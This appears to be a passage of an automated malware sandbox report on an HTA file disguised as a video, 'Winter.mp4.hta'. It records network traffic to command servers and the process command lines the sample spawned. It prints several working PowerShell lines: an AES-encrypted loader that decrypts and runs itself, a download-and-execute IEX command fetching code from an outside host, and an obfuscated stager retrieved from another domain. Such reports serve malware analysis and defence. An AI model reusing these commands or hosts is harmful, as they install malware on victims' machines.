                                                                                      Set-Cookie: PHPSESSID=msih4ak7763bipmod0d58pllg3; expires=Thu, 24 Apr 2025 02:12:00 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U3IbhIme0X%2BOECkKghhO4oInULVn0g4OtIXA93AmITR%2F3xBrWsZTShnzkv69hvAvHA4adINJfLBVLidYHbNUr3MsLs3uWpWHJZxD7DtVZOlB4FM4Y1R32mlZmRxuoZxw1NEcTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9866253ac243e9-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1649&rtt_var=640&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2015&delivery_rate=1682997&cwnd=242&unsent_bytes=0&cid=11afde3245abb989&ts=1018&x=0"
                                                                                      2024-12-29 08:25:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-29 08:25:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.549975104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:23 UTC266OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 113
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:23 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42
                                                                                      Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--bigJ&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=36058DC784D611A1962CEBBDF1A894EB
                                                                                      2024-12-29 08:25:24 UTC1126INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:24 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=7h97o1bjpcto83rv538m4e9s7k; expires=Thu, 24 Apr 2025 02:12:03 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xzBfJQw0j%2FV9i9glZ9XhkmJklPOpldxcOaW3B64SE5spzO04DFiZuK6A1QDIczY4CW6dutnEI1of6xOZWUSxsJqEVm2UpmX2UATyhXYnVGoIGUHZGU0Vvt50tKj5iRhBqErDVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f986633f9268c0f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2024&rtt_var=778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1015&delivery_rate=1389814&cwnd=223&unsent_bytes=0&cid=a88bf6e1db66d087&ts=808&x=0"
                                                                                      2024-12-29 08:25:24 UTC218INData Raw: 64 34 0d 0a 5a 66 38 67 6d 2b 6d 4b 79 6e 4c 46 78 73 4b 51 6a 36 51 68 45 4e 4f 44 67 36 52 47 4c 51 5a 6f 33 54 66 42 71 4a 34 6e 31 32 6b 2b 68 41 4c 75 79 37 44 6f 47 72 47 79 73 75 4f 31 2b 41 35 4d 2f 4f 44 6d 77 7a 4d 44 64 51 43 79 52 35 32 48 70 68 4c 67 58 56 66 4a 45 71 2f 64 76 4a 5a 64 74 61 37 73 35 50 66 51 41 7a 7a 78 35 66 65 47 66 42 38 71 53 72 67 56 2b 35 6e 6a 43 36 78 4c 45 4e 30 61 75 59 48 2b 76 67 4b 32 2f 4a 36 2f 30 34 74 4b 66 4c 72 7a 39 64 45 72 52 48 55 64 74 42 6d 79 77 50 46 58 69 30 59 4d 6b 56 54 45 69 75 61 36 4c 62 61 75 6f 37 37 37 33 46 55 79 2f 36 48 6c 30 47 51 58 4e 6b 54 2f 55 75 4f 53 72 6c 71 4b 0d 0a
                                                                                      Data Ascii: d4Zf8gm+mKynLFxsKQj6QhENODg6RGLQZo3TfBqJ4n12k+hALuy7DoGrGysuO1+A5M/ODmwzMDdQCyR52HphLgXVfJEq/dvJZdta7s5PfQAzzx5feGfB8qSrgV+5njC6xLEN0auYH+vgK2/J6/04tKfLrz9dErRHUdtBmywPFXi0YMkVTEiua6Lbauo7773FUy/6Hl0GQXNkT/UuOSrlqK
                                                                                      2024-12-29 08:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.549982185.161.251.214437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:26 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Host: cegu.shop
                                                                                      2024-12-29 08:25:26 UTC249INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.2
                                                                                      Date: Sun, 29 Dec 2024 08:25:26 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 329
                                                                                      Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                      Connection: close
                                                                                      ETag: "676c9e2a-149"
                                                                                      Accept-Ranges: bytes
                                                                                      2024-12-29 08:25:26 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                      Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:03:22:57
                                                                                      Start date:29/12/2024
                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\Winter.mp4.hta"
                                                                                      Imagebase:0x780000
                                                                                      File size:13'312 bytes
                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:03:22:59
                                                                                      Start date:29/12/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF222AD4A4FCB003B17174060EB5530CE7B9E694D54704BBE85697431BEF0DF8FB39514E546913E627324B7912AABC2519CDC16270DB9302DBA4235A5922582F6D19012A6A61A182460E5328B98785BBCA6DC1EE54C29B492DD0169BBDF0AD22735B4539FAB41765D2C78D6094D4933B0B9AB21F2194145068591FA2819F5844A17C9B3FE88007ABFFD555866F7C9BF9A7AE7857BD7D50BB0B679FDB641E588F7BA6998B1E09201B6E7429AAF1B53408F5BB85F586C567D650066E38E837E6F9B238A1169DAF40AC32351DE3006C93F4A0AC7408E46D98D725B1062464B5E6E747BE24FBD1B7DFEFCFDCA53481D894F0A6D7A6DF2DBAE5990233F3B5DD4A1DBC0E0C606F80172B012B5490EF0B0CC77328D4A2E0767896493EA713FDF1226247FDBEA1DA14AADF2D96D9AB01E6D4547C26AE');$CsiZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((rOnH('507A6B6D525573745374576441776A59')),[byte[]]::new(16)).TransformFinalBlock($hcNM,0,$hcNM.Length)); & $CsiZ.Substring(0,3) $CsiZ.Substring(129)
                                                                                      Imagebase:0xbd0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:03:22:59
                                                                                      Start date:29/12/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:03:23:08
                                                                                      Start date:29/12/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}
                                                                                      Imagebase:0xbd0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:03:23:08
                                                                                      Start date:29/12/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:03:25:03
                                                                                      Start date:29/12/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                      Imagebase:0xbd0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Reset < >
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163270112.000000000A9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A9B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_a9b0000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-2657877971
                                                                                        • Opcode ID: e02846dfa88f2e01c35658a77e595ea1a090674f777647d62c844821bb5b4cfb
                                                                                        • Instruction ID: 04e8ea01e5032534d2e88343b2083a9db5796b1ccbdda5e3bc016bceae1be525
                                                                                        • Opcode Fuzzy Hash: e02846dfa88f2e01c35658a77e595ea1a090674f777647d62c844821bb5b4cfb
                                                                                        • Instruction Fuzzy Hash: 86411731B24300AFDB288E948AC67AFB7D5EB44314F4045A9FD599B3A1C374EC41CB92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V)m
                                                                                        • API String ID: 0-3219898122
                                                                                        • Opcode ID: 17a0da6b309c83e7b3b0f6aae1e1af9aea33f1a119633cbcd129e4da22770dab
                                                                                        • Instruction ID: 1d0306bcb37f84d8c130df68d819e5e33db76bdfc74e53757469bc9ba4ce9bfd
                                                                                        • Opcode Fuzzy Hash: 17a0da6b309c83e7b3b0f6aae1e1af9aea33f1a119633cbcd129e4da22770dab
                                                                                        • Instruction Fuzzy Hash: CBB14C70E103099FDF10CFA9C9857ADBBF2BF88B04F148529D815EB264EB74A845CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a1a1e54ef2dc4f62300a960b9cc63fa124be203dc3df2763a71971d5b7330f6
                                                                                        • Instruction ID: b1ba1e365b37a3ef5311630d30409b45d2fe33f2f12e898533840a65e7e71c27
                                                                                        • Opcode Fuzzy Hash: 6a1a1e54ef2dc4f62300a960b9cc63fa124be203dc3df2763a71971d5b7330f6
                                                                                        • Instruction Fuzzy Hash: 9BB13D70E002198FDF10CFA9C9857ADBBF2BF89314F14C529D815EB2A4EB74A845CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$h2uh$tLth$x.sh$x.sh
                                                                                        • API String ID: 0-126770062
                                                                                        • Opcode ID: 65200525aad6df9f102a5f00506ced6e140d69ed5873d67aae5156b7fc1f383f
                                                                                        • Instruction ID: 4505a24592a77706c01dee5530be4c3e4e8da97e25ae782405610f18a09931b7
                                                                                        • Opcode Fuzzy Hash: 65200525aad6df9f102a5f00506ced6e140d69ed5873d67aae5156b7fc1f383f
                                                                                        • Instruction Fuzzy Hash: D94215B0B002149FCB14EF68C550B6EBBA6FF84314F558469E901AF359CB36DC86DBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-1988145694
                                                                                        • Opcode ID: 664faa56841ba8bff18f3c17879611bc23c901972a13dd4e4fe4aa3c40552704
                                                                                        • Instruction ID: 9951089f49257eb80a17f0835ae92d32ba81da1a3e52116276eaef9df55eddef
                                                                                        • Opcode Fuzzy Hash: 664faa56841ba8bff18f3c17879611bc23c901972a13dd4e4fe4aa3c40552704
                                                                                        • Instruction Fuzzy Hash: C8C19DB57402298FCB14AB78995067EBBEADFC6304B18847BD501CB395CE31CD56C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8N)m$Hnq$h])m$h])m$h])m$$jq$I)m
                                                                                        • API String ID: 0-524076932
                                                                                        • Opcode ID: 7b035d6176c30bf540ed46b9681ecebae9173b304e24f73b58e0e5971e20118f
                                                                                        • Instruction ID: c97f7029c660cb997a97e54866bb25fedbc722e1106749e42ef1feeede54c162
                                                                                        • Opcode Fuzzy Hash: 7b035d6176c30bf540ed46b9681ecebae9173b304e24f73b58e0e5971e20118f
                                                                                        • Instruction Fuzzy Hash: 90127834B002148FCB25DB24D854AAEB7F2BF89304F1481E9D949AB365DF35AD45CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$tLth$x.sh
                                                                                        • API String ID: 0-3593257027
                                                                                        • Opcode ID: 2ce385c88cf7c917ce7e4ddf2fbc6164e465efef60af1d913cb198cd532c5d1a
                                                                                        • Instruction ID: bd057fc937246a87a0db32c98ca3263941b43c9c73782edc44ce2be0ca14b30b
                                                                                        • Opcode Fuzzy Hash: 2ce385c88cf7c917ce7e4ddf2fbc6164e465efef60af1d913cb198cd532c5d1a
